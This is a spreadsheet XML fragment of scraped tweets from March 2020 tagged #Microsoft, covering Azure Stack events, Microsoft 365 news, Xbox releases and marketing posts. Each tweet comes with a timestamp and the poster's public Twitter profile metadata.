    <t>{'id': 1118180691819335680, 'id_str': '1118180691819335680', 'name': 'SPARKLE NIGERIA', 'screen_name': 'sparkleplaceng', 'location': 'Sparkle Place', 'description': 'A financial and lifestyle ecosystem that lives on your smartphone.', 'url': 'https://t.co/VB79SamIoO', 'entities': {'url': {'urls': [{'url': 'https://t.co/VB79SamIoO', 'expanded_url': 'http://www.sparkle.ng', 'display_url': 'sparkle.ng', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 118, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Tue Apr 16 15:53:46 +0000 2019', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1118180912825606144/seyZ2VO8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118180912825606144/seyZ2VO8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1118180691819335680/1573733777',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</si>
  <si>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10:31:10 +0000 2020</t>
  </si>
  <si>
    <t>. @TexasChildrens #CISO Teresa Tonthat talks about their huge #DigitalTransformation which included moving over 700 applications to a #HybridCloud environment. 
#HybridIT #CTO #ITOps #HPEalliances #Microsoft https://t.co/d6WwsHonu4</t>
  </si>
  <si>
    <t>Thu Mar 05 10:31:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft release statement on #COVID19 (Coronavirus) and #Microsoft365 preparedness, assessing impact to systems, locations and people, as well as guidance regarding best practices for #MicrosoftTeams https://t.co/kkUkLO5JOj</t>
  </si>
  <si>
    <t>{'id': 3004503069, 'id_str': '3004503069', 'name': 'Office 365 Ninjas', 'screen_name': 'Office365Ninjas', 'location': '', 'description': 'Daily dose of #Office365 useful tips, tricks, lifehacks, best practices and news', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3893, 'friends_count': 1299, 'listed_count': 112, 'created_at': 'Thu Jan 29 23:19:56 +0000 2015', 'favourites_count': 6757, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11306,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'http://pbs.twimg.com/profile_images/859797537724788736/jY_0k3Ls_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/859797537724788736/jY_0k3Ls_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3004503069/1493825525', 'profile_link_color': 'EE4000',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</si>
  <si>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10:30:59 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Game Pass: Ori and the Will of the Wisps e NBA 2K20 tra i giochi di Marzo
#Microsoft #NBA2K20 #OriAndTheWillOfTheWisps #PC #XboxGamePass #XboxOne #tuttotek
https://t.co/xdC2YHYNUf</t>
  </si>
  <si>
    <t>{'id': 3174290211, 'id_str': '3174290211', 'name': 'tuttoteK', 'screen_name': 'tuttoteKit', 'location': '', 'description': "ðŸ“¢ #tuttoteK Ã¨ il blog di opinione sul mondo della TECNOLOGIA ðŸ“± dei VIDEOGIOCHI ðŸŽ® e dell'INTRATTENIMENTO DIGITALE ðŸ“º. \nâ¬‡ï¸ Scopri di piÃ¹ sul nostro sito web!", 'url': 'https://t.co/gQ63UT19Pq', 'entities': {'url': {'urls': [{'url': 'https://t.co/gQ63UT19Pq', 'expanded_url': 'https://www.tuttotek.it/', 'display_url': 'tuttotek.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5707, 'friends_count': 86, 'listed_count': 48, 'created_at': 'Thu Apr 16 22:41:27 +0000 2015', 'favourites_count': 684, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 17182,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'http://pbs.twimg.com/profile_images/849688232094838796/6sRe8X-Y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/849688232094838796/6sRe8X-Y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3174290211/1575041417',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</si>
  <si>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10:30:23 +0000 2020</t>
  </si>
  <si>
    <t>Meet our team at @CallCentreEx on 18-19 March on the @4NetTech stand, for the opportunity to gain insight on how our #contactcentre solutions for #Microsoft teams can enhance your #customerservice team and better your #CX: https://t.co/ankzbjFIzu https://t.co/OuPxWNzT1l</t>
  </si>
  <si>
    <t>{'id': 278061000, 'id_str': '278061000', 'name': 'Enghouse Interactive', 'screen_name': 'EnghouseInterac', 'location': '', 'description': 'Enghouse Interactive delivers global interaction management solutions from Arc Solutions, CosmoCom, Datapulse, Syntellect, Telrex, Trio &amp; Zeacom.', 'url': 'http://t.co/VddKUdAG1F', 'entities': {'url': {'urls': [{'url': 'http://t.co/VddKUdAG1F', 'expanded_url': 'http://www.enghouseinteractive.com', 'display_url': 'enghouseinteractive.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2617, 'friends_count': 3910, 'listed_count': 117, 'created_at': 'Wed Apr 06 14:43:24 +0000 2011', 'favourites_count': 920, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9792,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'http://pbs.twimg.com/profile_images/667550297753935872/xOaOhXT__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/667550297753935872/xOaOhXT__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/278061000/1524254407',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</si>
  <si>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10:27:59 +0000 2020</t>
  </si>
  <si>
    <t>Maria Jordan talks about the 3 major #AzureStackHub use cases edge &amp;amp; disconnected, regulatory and data sovereignity and Application Moderniziation at the @HPE #Microsoft #HybridCloud Summit in Lisbon. 
#HPE #Microsoft #AzureStack #AzureStackHCI @Azure 
 #HCI @PTmicrosoft @HPE_ES https://t.co/NVJ4VdIYz8</t>
  </si>
  <si>
    <t>Thu Mar 05 10:27:53 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Goes All-In On RPA (Robotic Process #Automation) - #Forbes https://t.co/B7LT6qupfw
#RPA #BPA #DPA #Robots #Bots #AI #ML #DL #tech #Technews #Automation #Robotics</t>
  </si>
  <si>
    <t>{'id': 91608548, 'id_str': '91608548', 'name': 'Amitav Bhattacharjee', 'screen_name': 'bamitav', 'location': 'Bangalore, India', 'description': 'Co-Founder &amp; SVP @Ta3s_Co | Tweets for #STEM Community &amp; Tech Leaders (#CSuite #CXO #CEO #CIO #CTO) on Global #TechTrends &amp; #Technological Advances!', 'url': 'https://t.co/quVqXD3wLQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/quVqXD3wLQ', 'expanded_url': 'http://www.linkedin.com/in/amitavbhattacharjee', 'display_url': 'linkedin.com/in/amitavbhattâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25267, 'friends_count': 19848, 'listed_count': 4959, 'created_at': 'Sat Nov 21 16:54:25 +0000 2009', 'favourites_count': 23444, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 94208, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9266CC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1207863605703561217/cC5G_Kj4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207863605703561217/cC5G_Kj4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/91608548/1579234079', 'profile_link_color': 'E81C4F', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E6F6F9', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 10:27:38 +0000 2020</t>
  </si>
  <si>
    <t>SURPRISE! Halo Combat Evolved has dropped: https://t.co/jVVHsjrBr7 #Halo #CombatEvolved #Microsoft #Steam</t>
  </si>
  <si>
    <t>{'id': 399109571, 'id_str': '399109571', 'name': 'MyFallen Gaming Community', 'screen_name': 'MyFallenGC', 'location': 'In Your Heart', 'description': "Official Twitter of the MyFallen Gaming Community.\n\nWe're live on Discord @ https://t.co/3DGqryo8S4", 'url': 'http://t.co/OEQULpmQjL', 'entities': {'url': {'urls': [{'url': 'http://t.co/OEQULpmQjL', 'expanded_url': 'http://myfallen.net', 'display_url': 'myfallen.net', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/3DGqryo8S4', 'expanded_url': 'https://discord.gg/X7uNsBU', 'display_url': 'discord.gg/X7uNsBU', 'indices': [76, 99]}]}}, 'protected': False, 'followers_count': 41, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Thu Oct 27 00:40:58 +0000 2011', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 873,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'http://pbs.twimg.com/profile_images/1222828114171981825/H5VCXY8o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222828114171981825/H5VCXY8o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/399109571/1580379506', 'profile_link_color': '822FED',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</si>
  <si>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Mar 05 10:25:42 +0000 2020</t>
  </si>
  <si>
    <t>#LinuxFoundation Adds Another #Microsoft Executive to Its Leadership (Fourth by Count) https://t.co/7duoVMuvp4  https://t.co/DIm1aYarjT</t>
  </si>
  <si>
    <t>Thu Mar 05 10:25:37 +0000 2020</t>
  </si>
  <si>
    <t>We're at the @SheConferenceNo in Oslo! Come say hi  #iamcp #microsoft #DiversityandInclusion https://t.co/13mP6WXp5U</t>
  </si>
  <si>
    <t>{'id': 92275909, 'id_str': '92275909', 'name': 'IAMCP_UK', 'screen_name': 'IAMCPUK', 'location': 'UK', 'description': 'UK Chapter of The International Association of Microsoft Channel Partners', 'url': 'https://t.co/ILuTIAm7As', 'entities': {'url': {'urls': [{'url': 'https://t.co/ILuTIAm7As', 'expanded_url': 'http://www.iamcp.uk/', 'display_url': 'iamcp.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 597, 'friends_count': 360, 'listed_count': 27, 'created_at': 'Tue Nov 24 13:47:11 +0000 2009', 'favourites_count': 62, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4665,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'http://pbs.twimg.com/profile_images/729998549635747842/KbUa7V3R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/729998549635747842/KbUa7V3R_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/92275909/1462839004',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</si>
  <si>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10:24:51 +0000 2020</t>
  </si>
  <si>
    <t>EY, #Microsoft and ConsenSys Launch Enterprise Platform on #Ethereum Mainnet
https://t.co/V1Zr1dHQmY
https://t.co/ozHNZE2lc7</t>
  </si>
  <si>
    <t>Thu Mar 05 10:24:14 +0000 2020</t>
  </si>
  <si>
    <t>Microservice with Azure Kubernetes Service conference kicked off by @oyuksektepeli at @Workinton #microsoft #microsoftazure #rempeople with @anilyugen @yagizsrkn https://t.co/GcDUqHjvgg</t>
  </si>
  <si>
    <t>{'id': 15791098, 'id_str': '15791098', 'name': 'Tolga ArÄ±can', 'screen_name': 'tolgaarican', 'location': 'Istanbul, TÃ¼rkiye', 'description': 'social nerd, tech lover, speed addict, life hacker, entrepreneur, manager, coder, speaker, er, errrr, erRRrrR..', 'url': 'https://t.co/hrGQPvFcAP', 'entities': {'url': {'urls': [{'url': 'https://t.co/hrGQPvFcAP', 'expanded_url': 'http://tolgaarican.com', 'display_url': 'tolgaarican.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1659, 'friends_count': 1236, 'listed_count': 125, 'created_at': 'Sat Aug 09 18:23:19 +0000 2008', 'favourites_count': 750, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8101, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/869584166685483009/ypbORHUx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/869584166685483009/ypbORHUx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15791098/1468225851',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</si>
  <si>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10:22:34 +0000 2020</t>
  </si>
  <si>
    <t>EY, #Microsoft and ConsenSys Launch Enterprise Platform on #Ethereum Mainnet https://t.co/Pg3n29EpR5 via @cointelegraph</t>
  </si>
  <si>
    <t>{'id': 1145469253619003392, 'id_str': '1145469253619003392', 'name': 'Crypto 1', 'screen_name': 'BTC000001', 'location': '', 'description': '#Hodl\n#Bitcoin #BnB #Atom #Xtz #Chz #Matic #Tomo', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 994, 'friends_count': 65, 'listed_count': 1, 'created_at': 'Sun Jun 30 23:08:46 +0000 2019', 'favourites_count': 453, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 652, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1225438631315243008/PXwfCjOi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225438631315243008/PXwfCjOi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1145469253619003392/1583436320',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</si>
  <si>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10:20:03 +0000 2020</t>
  </si>
  <si>
    <t>Applications drive the business, but what drives the creation of new, powerful applications? Thats what attendees at todays #HPE #Microsoft #HybridCloud Roadshow in Lisbon learn from Microsoft's Maria Jordan #AzureStack, #AzureStackHub #AzureStackHCI https://t.co/Ztd99R8ovS https://t.co/fvxZDqxRr0</t>
  </si>
  <si>
    <t>Thu Mar 05 10:20:01 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Omfg... what is going on Right now!! 
Yesterday India, Today South Korea!! 
$link and #microsoft 
Bullrun is on Track </t>
  </si>
  <si>
    <t>{'id': 993112707095318528, 'id_str': '993112707095318528', 'name': 'Chris', 'screen_name': 'CKopeinig', 'location': 'Velden am WÃ¶rther See', 'description': 'Cryptoinvestor', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 166, 'friends_count': 252, 'listed_count': 3, 'created_at': 'Sun May 06 12:58:15 +0000 2018', 'favourites_count': 11037, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1293, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226197131574366214/YdNQnvJ1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226197131574366214/YdNQnvJ1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/993112707095318528/1581966472',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</si>
  <si>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10:17:35 +0000 2020</t>
  </si>
  <si>
    <t>Though majority not ready to realise real benefits #Microsoft Japan introduced a 4-day week and the benefits went far beyond a long weekend #experiment #productivity #creativity #worklifebalance #flexibleworkinghours #management #strategy #futureworkplace https://t.co/2c8Y62AN4U</t>
  </si>
  <si>
    <t>{'id': 33157583, 'id_str': '33157583', 'name': 'Niroshana De Silva', 'screen_name': 'niroshanad', 'location': '', 'description': 'PR person, Social media enthusiast.... also I express my personal views here :)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 525, 'friends_count': 775, 'listed_count': 111, 'created_at': 'Sun Apr 19 07:40:50 +0000 2009', 'favourites_count': 2772, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12106,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'http://pbs.twimg.com/profile_images/589112484159590400/8cPFmThS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/589112484159590400/8cPFmThS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33157583/1554644213', 'profile_link_color': '040A7A',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</si>
  <si>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10:14:07 +0000 2020</t>
  </si>
  <si>
    <t>New #Microsoft Exchange Online PowerShell module which moves to the Update/Install-Module methodology like other modern modules. No more silly standalone app to install, just run 'Connect-ExchangeOnline' after importing.  Also includes some new cmdlets. https://t.co/6i07fVOsg6 https://t.co/A8P6vFJV8S</t>
  </si>
  <si>
    <t>{'id': 145088059, 'id_str': '145088059', 'name': 'Jeff Schertz', 'screen_name': 'jdscher', 'location': 'Asheville, NC', 'description': 'Microsoft Solutions Architect at Poly / Microsoft MVP', 'url': 'http://t.co/rjxgNmKMwq', 'entities': {'url': {'urls': [{'url': 'http://t.co/rjxgNmKMwq', 'expanded_url': 'http://blog.schertz.name', 'display_url': 'blog.schertz.name', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3617, 'friends_count': 161, 'listed_count': 96, 'created_at': 'Tue May 18 02:57:46 +0000 2010', 'favourites_count': 50, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 820,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'http://pbs.twimg.com/profile_images/1014099269979115530/TX9b3awJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1014099269979115530/TX9b3awJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/145088059/1542856339',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</si>
  <si>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10:12:22 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to introduce a free tier of its #Cosmos DB #NoSQL database https://t.co/hZflk4qonS via @ZDNet &amp;amp; @maryjofoley</t>
  </si>
  <si>
    <t>Thu Mar 05 10:11:00 +0000 2020</t>
  </si>
  <si>
    <t>Alexandra is talking about #HPE solutions for #Microsoft #AzureStack portfolio, the broadest set of integrated &amp;amp; certified solutions from #AzurestackHub to #AzurestackHCI 
more at https://t.co/JuaCQWWvUF
#Hybridcloud #WomenIntech @p3dromorais @AcrmSilva #HCI @lmrilho https://t.co/bdDvm2sEV1</t>
  </si>
  <si>
    <t>Thu Mar 05 10:10:55 +0000 2020</t>
  </si>
  <si>
    <t>#TIL: #Microsoft is giving away a #PowerApps template for #Crisis #Communication and making Push Notifications #free for the duration of #Covid19 #Coronavirus https://t.co/4mm6mT0BSn
@JFDIConsulting can #help out with #implementation https://t.co/VaJah6ZD8w</t>
  </si>
  <si>
    <t>Thu Mar 05 10:10:47 +0000 2020</t>
  </si>
  <si>
    <t>3 major #AzureStackEdge key use cases : #ML at the Edge, #Edge Compute &amp;amp; #IoT Solutions and  Network #Data transfer from #EdgeToCloud #Microsoft #microsoftazure #innomatics #innomaticshyd https://t.co/9V9b7XOJon</t>
  </si>
  <si>
    <t>{'id': 1232555987782889474, 'id_str': '1232555987782889474', 'name': 'Tarun Teja', 'screen_name': 'Nithink70251862', 'location': 'Hyderabad', 'description': 'Digital marketer\nSEO &amp; SMM', 'url': 'https://t.co/3FawQVBxBD', 'entities': {'url': {'urls': [{'url': 'https://t.co/3FawQVBxBD', 'expanded_url': 'https://www.innomatics.in/advanced-data-science-training-in-hyderabad/', 'display_url': 'innomatics.in/advanced-data-â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 141, 'listed_count': 1, 'created_at': 'Wed Feb 26 06:40:34 +0000 2020', 'favourites_count': 104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 61, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232556155487940608/An_nc2FY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232556155487940608/An_nc2FY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1232555987782889474/1583219477',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</si>
  <si>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10:06:29 +0000 2020</t>
  </si>
  <si>
    <t>#Modernization of Web #Applications to #Microsoft #Azure. Validate your expertise in migrating &amp;amp; deploying production web application workloads, applying #DevOps practices, &amp;amp; managing application services in Azure. Read: https://t.co/8Hhkhby0T1 #cto #ilinkDigital #ilinkdifference https://t.co/ZnruBl4ltJ</t>
  </si>
  <si>
    <t>Thu Mar 05 10:06:26 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/77k5LabwZd
CORSO ECDL BASE - WORD
#aica #applicazioni #apps #computer #doc #document #ecdl #elaborazione #input #microsoft #microsoft_office_suite #modulo_3 #office #output #save #software #suite #texteditor #word #wordprocessing #icdl
https://t.co/miXfvkAQFc https://t.co/93EoX5Sc5v</t>
  </si>
  <si>
    <t>{'id': 56823612, 'id_str': '56823612', 'name': 'enzo exposyto', 'screen_name': 'enzoexposyto', 'location': 'amalfi coast', 'description': '', 'url': 'https://t.co/97MqSEqApM', 'entities': {'url': {'urls': [{'url': 'https://t.co/97MqSEqApM', 'expanded_url': 'http://www.enzoexposito.it/mobile', 'display_url': 'enzoexposito.it/mobile', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 65, 'friends_count': 318, 'listed_count': 0, 'created_at': 'Tue Jul 14 21:33:52 +0000 2009', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1686,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'http://pbs.twimg.com/profile_images/313792753/MadreTerra-PadreMare_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/313792753/MadreTerra-PadreMare_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/56823612/1451812572',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</si>
  <si>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10:06:10 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/77k5LabwZd
CORSO ECDL BASE - WORD
#aica #applicazioni #apps #computer #doc #document #ecdl #elaborazione #input #microsoft #microsoft_office_suite #modulo_3 #office #output #save #software #suite #texteditor #word #wordprocessing #icdl
https://t.co/miXfvkAQFc https://t.co/8l2ejsL5fO</t>
  </si>
  <si>
    <t>Thu Mar 05 10:05:40 +0000 2020</t>
  </si>
  <si>
    <t>Installing the latest code samples. #visualbasic #tech #microsoft https://t.co/s6rU4zDOVS</t>
  </si>
  <si>
    <t>{'id': 17116419, 'id_str': '17116419', 'name': 'Lee Nattress ðŸ•¸ï¸', 'screen_name': 'leenattress', 'location': 'North east of England', 'description': 'Heck.', 'url': 'https://t.co/v9T1iUXWVd', 'entities': {'url': {'urls': [{'url': 'https://t.co/v9T1iUXWVd', 'expanded_url': 'http://www.leenattress.com/', 'display_url': 'leenattress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 768, 'friends_count': 804, 'listed_count': 59, 'created_at': 'Sun Nov 02 16:44:52 +0000 2008', 'favourites_count': 4933, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6705, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '5F0202', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/953660562965221383/kyImJKZZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/953660562965221383/kyImJKZZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17116419/1513197237', 'profile_link_color': '981CEB', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '6B6B6B', 'profile_text_color': 'ADADAD', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 10:05:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Best SQL Tutorial from A to Z
https://t.co/W1YqXP9Lwq
#SQLServer #SQL #AI #DataScience #DataScientist #BI #Business #DataAnalytics  #microsoft</t>
  </si>
  <si>
    <t>{'id': 3302651196, 'id_str': '3302651196', 'name': 'JA Directives - Small Business Insights', 'screen_name': 'Jadirectivestwt', 'location': '', 'description': 'We Provide Contents &amp; Tools for #SmallBusiness #Entrepreneurs #SocialMediaMarketing &amp; #Startups. No 20 #BusinessIntelligence Brand by Onalytica.', 'url': 'https://t.co/ak7eZfPKJE', 'entities': {'url': {'urls': [{'url': 'https://t.co/ak7eZfPKJE', 'expanded_url': 'http://www.jadirectives.com', 'display_url': 'jadirectives.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6122, 'friends_count': 6103, 'listed_count': 915, 'created_at': 'Fri Jul 31 19:04:05 +0000 2015', 'favourites_count': 24489, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 40882,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'http://pbs.twimg.com/profile_images/718371204088901633/jmzhzxjF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/718371204088901633/jmzhzxjF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3302651196/1548220714',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</si>
  <si>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Mar 05 10:04:17 +0000 2020</t>
  </si>
  <si>
    <t>#Celebrating #InternationalWomen's Day - Meet the ITOpsTalk women #InternationalWomanDay https://t.co/x82iCLdwAi #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Thu Mar 05 10:02:42 +0000 2020</t>
  </si>
  <si>
    <t>When going into the #MEMCM "#Microsoft #Edge Management&amp;gt; All Microsoft Edge Updates" space for the first time 'Title' is not shown by default and the first column is Vendor. Easy enough to resolve by right clicking.  Is this by design or a small bug ? @djammmer https://t.co/GxUAlkIUV5</t>
  </si>
  <si>
    <t>{'id': 890848471, 'id_str': '890848471', 'name': 'Jonathan [MCSE]', 'screen_name': 'syswow64blog', 'location': 'London, England', 'description': "I'm a Client Platform Manager specializing in Systems Center Management and OSD. The opinions on this account are my own", 'url': 'https://t.co/Q3iqBS8TzQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/Q3iqBS8TzQ', 'expanded_url': 'http://www.systemcenterblog.co.uk', 'display_url': 'systemcenterblog.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 333, 'friends_count': 146, 'listed_count': 7, 'created_at': 'Fri Oct 19 11:58:43 +0000 2012', 'favourites_count': 531, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 999,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'http://pbs.twimg.com/profile_images/602174073242820608/BACCAvxM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/602174073242820608/BACCAvxM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/890848471/1524648312',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</si>
  <si>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10:02:25 +0000 2020</t>
  </si>
  <si>
    <t>In the driver's seat with Jimmie Johnson and the Lap Analyzer tool | Microsoft In Culture  https://t.co/47QyEGNo9C  #Microsoft https://t.co/i3XFWWceXJ</t>
  </si>
  <si>
    <t>In the driver's seat with Jimmie Johnson and the Lap Analyzer tool | Microsoft In Culture  https://t.co/EkqET8bo06  #Microsoft https://t.co/9ejzdiDnDr</t>
  </si>
  <si>
    <t>Thu Mar 05 10:01:06 +0000 2020</t>
  </si>
  <si>
    <t>Windows collaboration display from Sharp is a brand new type of #InteractiveDisplay for meetings and teamwork. Find out how the world's first #Microsoft certified display for #collaboration can make your business more effective: https://t.co/FT1KjWx22H</t>
  </si>
  <si>
    <t>{'id': 2939507350, 'id_str': '2939507350', 'name': 'SharpBusinessSystems', 'screen_name': 'SharpBusinessUK', 'location': 'Wakefield, England', 'description': 'Official Twitter of Sharp Business Systems UK, provider of market-leading B2B products. Our mission is to develop innovative products that let you Be Original.', 'url': 'https://t.co/5kU7DxT9aw', 'entities': {'url': {'urls': [{'url': 'https://t.co/5kU7DxT9aw', 'expanded_url': 'http://www.sharp.co.uk', 'display_url': 'sharp.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 592, 'friends_count': 222, 'listed_count': 12, 'created_at': 'Wed Dec 24 12:52:46 +0000 2014', 'favourites_count': 270, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1649,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'http://pbs.twimg.com/profile_images/1110174176365740032/pDOVirih_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110174176365740032/pDOVirih_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2939507350/1553520999', 'profile_link_color': 'E6000D',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</si>
  <si>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10:01:00 +0000 2020</t>
  </si>
  <si>
    <t>3 major #AzureStackEdge key use cases : #ML at the Edge, #Edge Compute &amp;amp; #IoT Solutions and  Network #Data transfer from #EdgeToCloud 
#HPE #Microsoft Summit Lisbon
#AzureStack #EdgeComputing #Edgeline @renggli_Urs #HCI @DamirB @cheng__wei @WSV_GUY @AlexanderOrtha @PTmicrosoft https://t.co/eMFwKqCmGR</t>
  </si>
  <si>
    <t>Thu Mar 05 10:00:52 +0000 2020</t>
  </si>
  <si>
